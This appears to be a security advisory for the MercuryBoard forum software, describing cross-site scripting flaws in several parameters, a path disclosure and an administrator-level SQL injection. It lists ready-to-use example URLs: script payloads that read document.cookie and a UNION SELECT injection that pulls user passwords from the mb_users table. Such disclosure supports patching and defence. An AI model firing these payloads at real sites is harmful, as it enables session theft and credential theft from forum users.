Description
|
|
Several vulnerabilities were reported in MercuryBoard, which could be exploited to conduct a Cross Site Scripting attack or disclosure path information. The first flaw results from several input validation errors in the "/func/pm.php" and "/func/members.php" when handling malformed "s", "l", "a", "t", "to" and "re" parameters, which may be exploited to conduct Cross Site Scripting attacks. The second vulnerability resides in the "global.php" file, and could be exploited to determine the installation path by supplying a specially crafted URL. The third issue could be exploited by an administrator to conduct SQL Injection attacks, by supplying a specially crafted URL.
Examples :
XSS - http://www.site.com/mercuryboard/index.php?a='><script>alert(document.cookie)</script>
XSS - http://www.site.com/mercuryboard/index.php?a=post&s='><script>alert(document.cookie)</script>
XSS - http://www.site.com/mercuryboard/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
XSS - http://www.site.com/mercuryboard/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
XSS - http://www.site.com/mercuryboard/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
XSS - http://www.site.com/mercuryboard/index.php?a=cp&s='><script>alert(document.cookie)</script>
Path disclosure - http://www.site.com/mercuryboard/index.php?a=forum&f=2&min=0&n=0
SQL Injection - http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*
|